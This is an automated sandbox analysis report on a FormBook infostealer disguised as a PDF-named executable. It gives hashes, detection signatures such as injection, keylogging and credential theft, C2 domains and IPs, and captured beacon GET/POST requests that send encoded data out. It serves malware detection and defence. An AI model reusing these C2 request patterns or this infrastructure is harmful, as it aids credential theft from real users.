Windows Analysis Report
Product Data Specifications_PDF.exe

Overview

General Information

Sample name: Product Data Specifications_PDF.exe
Analysis ID: 1519456
MD5: 94cc1457803df28f1d4c7a39db96e956
SHA1: 0b1f19f44e162dcc5e06d5619b0e72d3e654293b
SHA256: 64f6025326f3f7edca173d44ef56a85198b28c132b7e0afd3b599ccc3b593624
Tags: exeuser-TeamDreier
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

barindex
Source: Product Data Specifications_PDF.exe Avira: detected
Source: Product Data Specifications_PDF.exe ReversingLabs: Detection: 55%
Source: Yara match File source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1764340850.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1764028622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3150227447.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3155322481.0000000000740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1764711374.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3158420814.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: Product Data Specifications_PDF.exe Joe Sandbox ML: detected
Source: Product Data Specifications_PDF.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EyHLOQmzGKBL.exe, 0000000B.00000002.3150184532.0000000000C2E000.00000002.00000001.01000000.00000005.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3158489815.0000000000C2E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: cmdl32.pdbGCTL source: svchost.exe, 00000009.00000003.1733070057.0000000003025000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1733005926.000000000301B000.00000004.00000020.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000B.00000002.3155445381.0000000001368000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: Product Data Specifications_PDF.exe, 00000006.00000003.1378207323.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, Product Data Specifications_PDF.exe, 00000006.00000003.1378088013.0000000004640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1668357541.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1764371082.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1666529619.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1764371082.000000000379E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3158930427.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3158930427.0000000004F5E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1783633170.0000000004C14000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1781322079.0000000004A6B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cmdl32.pdb source: svchost.exe, 00000009.00000003.1733070057.0000000003025000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1733005926.000000000301B000.00000004.00000020.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000B.00000002.3155445381.0000000001368000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Product Data Specifications_PDF.exe, 00000006.00000003.1378207323.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, Product Data Specifications_PDF.exe, 00000006.00000003.1378088013.0000000004640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000009.00000003.1668357541.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1764371082.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1666529619.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1764371082.000000000379E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, cmdl32.exe, 0000000C.00000002.3158930427.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3158930427.0000000004F5E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1783633170.0000000004C14000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1781322079.0000000004A6B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: cmdl32.exe, 0000000C.00000002.3159746980.00000000053EC000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3155201371.0000000003178000.00000004.00000020.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000279C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2081521933.0000000020B1C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: cmdl32.exe, 0000000C.00000002.3159746980.00000000053EC000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3155201371.0000000003178000.00000004.00000020.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000279C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2081521933.0000000020B1C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 6_2_00452492
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00442886
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 6_2_004788BD
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 6_2_004339B6
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 6_2_0045CAFA
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00431A86
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 6_2_0044BD27
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0045DE8F FindFirstFileW,FindClose, 6_2_0045DE8F
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_0044BF8B
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02BAC980 FindFirstFileW,FindNextFileW,FindClose, 12_2_02BAC980
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 4x nop then xor eax, eax 12_2_02B99B30
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 4x nop then pop edi 12_2_02B9E4DF
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 4x nop then mov ebx, 00000004h 12_2_04C104DE
Source: Joe Sandbox View IP Address: 162.0.238.43 162.0.238.43
Source: Joe Sandbox View IP Address: 45.114.171.236 45.114.171.236
Source: Joe Sandbox View IP Address: 84.32.84.32 84.32.84.32
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_004422FE InternetQueryDataAvailable,InternetReadFile, 6_2_004422FE
Source: global traffic HTTP traffic detected: GET /vzgx/?fRr0=tfAptZ&Z0=fAt7pIVPpGXAvBzcGITPA7OHGvP4drUtR0TDZSipM2iZbUNyxYUxCE+UHA0v6t9lkzzVyERFWiUA+TPVxmGbgZvp38A33fVcU72oeaDS2r7GjI1g6DEPKEsN3N2XW07UJj8EjHQ8jzqg HTTP/1.1Host: www.trapkitten.websiteAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
Source: global traffic HTTP traffic detected: GET /toq1/?Z0=uFBHOFjbtFvxqkces1RGqIZYNgmiur5XIDe+8RHTfxNdoahKRW8Ulx3EiPWAiOWTg+KGn77UKm1RYG+ByVGjA2HLhLGNIPNt7CZLxVcbhsRd+xmlQzDGNJYRcWCQEWce52MF6lNTmRQD&fRr0=tfAptZ HTTP/1.1Host: www.qwefs.orgAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
Source: global traffic HTTP traffic detected: GET /wc8m/?fRr0=tfAptZ&Z0=LNw/HBPP4tr5bvxS3kL5kO0L1X3Nhxx3YB7NlE9rWxPCxu7fGi7WEXTbZRsRhvhxvKZ1WqSKGQ11o+IxPCwZhMc0vkrsKf8OYx9AcoiAA17H2AQJPV0Zg3KmaIPVvP4iA0nhUXGrqtBT HTTP/1.1Host: www.dfmagazine.shopAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
Source: global traffic HTTP traffic detected: GET /za6x/?fRr0=tfAptZ&Z0=EgAkyEJNK52+6mt0ZZzaOaTRCjAqhTrWwvgRo5oIQtO9ZSuXgOHTRb0W4iTGk1GYFMCByhdBFH2COuTwpe8yjCAk5/Of1W40SqKn8hyiq9h4asN2CcaU88uOnsZx5gwZ1TVihW9sV3GM HTTP/1.1Host: www.disn-china.buzzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
Source: global traffic HTTP traffic detected: GET /gekb/?Z0=5z2j4JvjBCmnxDGlKBgzTD3+HUD/dd2fumCOi9/ZiiqSem4bSPmiTeLNTUQRFOSACWspsHfkjQi2G8tl0kaRWA67inr6j8yvx+6PXqz9iyZ5+RA70tZ4RmMUT5lyJ2S3VdPbvKQVdTVJ&fRr0=tfAptZ HTTP/1.1Host: www.kevin-torkelson.infoAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
Source: global traffic HTTP traffic detected: GET /to69/?Z0=jnxbIh9toY3Lk084faTvVBMEFxwUktgIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXB9gkhdqEj3u6wGNYEX9l8USgN38burlDvemyCHtOx57idtfraeuBs8os&fRr0=tfAptZ HTTP/1.1Host: www.mandemj.topAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
Source: global traffic DNS traffic detected: DNS query: www.trapkitten.website
Source: global traffic DNS traffic detected: DNS query: www.qwefs.org
Source: global traffic DNS traffic detected: DNS query: www.dfmagazine.shop
Source: global traffic DNS traffic detected: DNS query: www.mktimediato.online
Source: global traffic DNS traffic detected: DNS query: www.disn-china.buzz
Source: global traffic DNS traffic detected: DNS query: www.kevin-torkelson.info
Source: global traffic DNS traffic detected: DNS query: www.mandemj.top
Source: unknown HTTP traffic detected: POST /toq1/ HTTP/1.1Host: www.qwefs.orgAccept: */*Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.qwefs.orgContent-Length: 215Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedConnection: closeReferer: http://www.qwefs.org/toq1/User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)Data Raw: 5a 30 3d 6a 48 70 6e 4e 31 66 4b 76 6d 69 46 39 45 45 53 6a 46 5a 6e 7a 70 35 36 41 68 65 4c 71 61 59 69 53 54 76 66 37 51 47 31 53 6a 5a 7a 68 74 6c 53 62 30 63 4c 7a 45 47 6e 67 64 53 30 6e 72 65 4d 69 36 48 6a 78 34 36 36 4f 6b 6c 52 62 54 6e 69 67 33 6d 68 52 57 79 7a 72 70 79 35 44 74 42 41 6d 53 5a 70 68 6e 63 6c 75 38 4a 6e 79 6e 61 78 45 44 7a 43 43 34 38 35 4a 54 2b 6f 4b 58 78 41 37 6d 77 53 74 69 4d 31 69 41 38 39 51 6f 62 62 34 4d 55 6d 54 62 6c 45 4f 2f 47 47 52 78 4c 71 61 65 4f 6f 4d 30 76 6f 43 74 4a 65 65 6f 31 38 6f 45 30 78 73 75 7a 58 58 30 65 79 71 35 70 65 37 34 42 6c 33 58 32 43 2f 6c 52 55 49 71 62 57 2f 51 3d 3d Data Ascii: Z0=jHpnN1fKvmiF9EESjFZnzp56AheLqaYiSTvf7QG1SjZzhtlSb0cLzEGngdS0nreMi6Hjx466OklRbTnig3mhRWyzrpy5DtBAmSZphnclu8JnynaxEDzCC485JT+oKXxA7mwStiM1iA89Qobb4MUmTblEO/GGRxLqaeOoM0voCtJeeo18oE0xsuzXX0eyq5pe74Bl3X2C/lRUIqbW/Q==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:24:03 GMTContent-Type: text/htmlContent-Length: 634Connection: closeServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 8c 20 d0 bf d1 80 d0 b8 20 d0 bd d0 b0 d0 b1 d0 be d1 80 d0 b5 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d0 b0 2c 20 d0 b8 d0 bb d0 b8 20 d1 81 d1 81 d1 8b d0 bb d0 ba d0 b0 2c 20 d0 bf d0 be 20 d0 ba d0 be d1 82 d0 be d1 80 d0 be d0 b9 20 d0 b2 d1 8b 20 d0 bf d1 80 d0 be d1 88 d0 bb d0 b8 2c 20 d1 83 d1 81 d1 82 d0 b0 d1 80 d0 b5 d0 bb d0 b0 2e 3c 2f 70 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 69 6e 6f 2e 72 75 22 3e d0 94 d0 b6 d0 b8 d0 bd d0 be 3c 2f 61 3e 3c 2f 70 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 70 61 72 6b 69 6e 67 2d 73 74 61 74 69 63 2e 6a 69 6e 6f 2e 72 75 2f 73 74 61 74 69 63 2f 6d 61 69 6e 2e 6a 73 3f 31 2e 32 35 2e 32 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 13:25:09 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 13:25:12 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 13:25:15 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 13:25:17 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 13:24:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 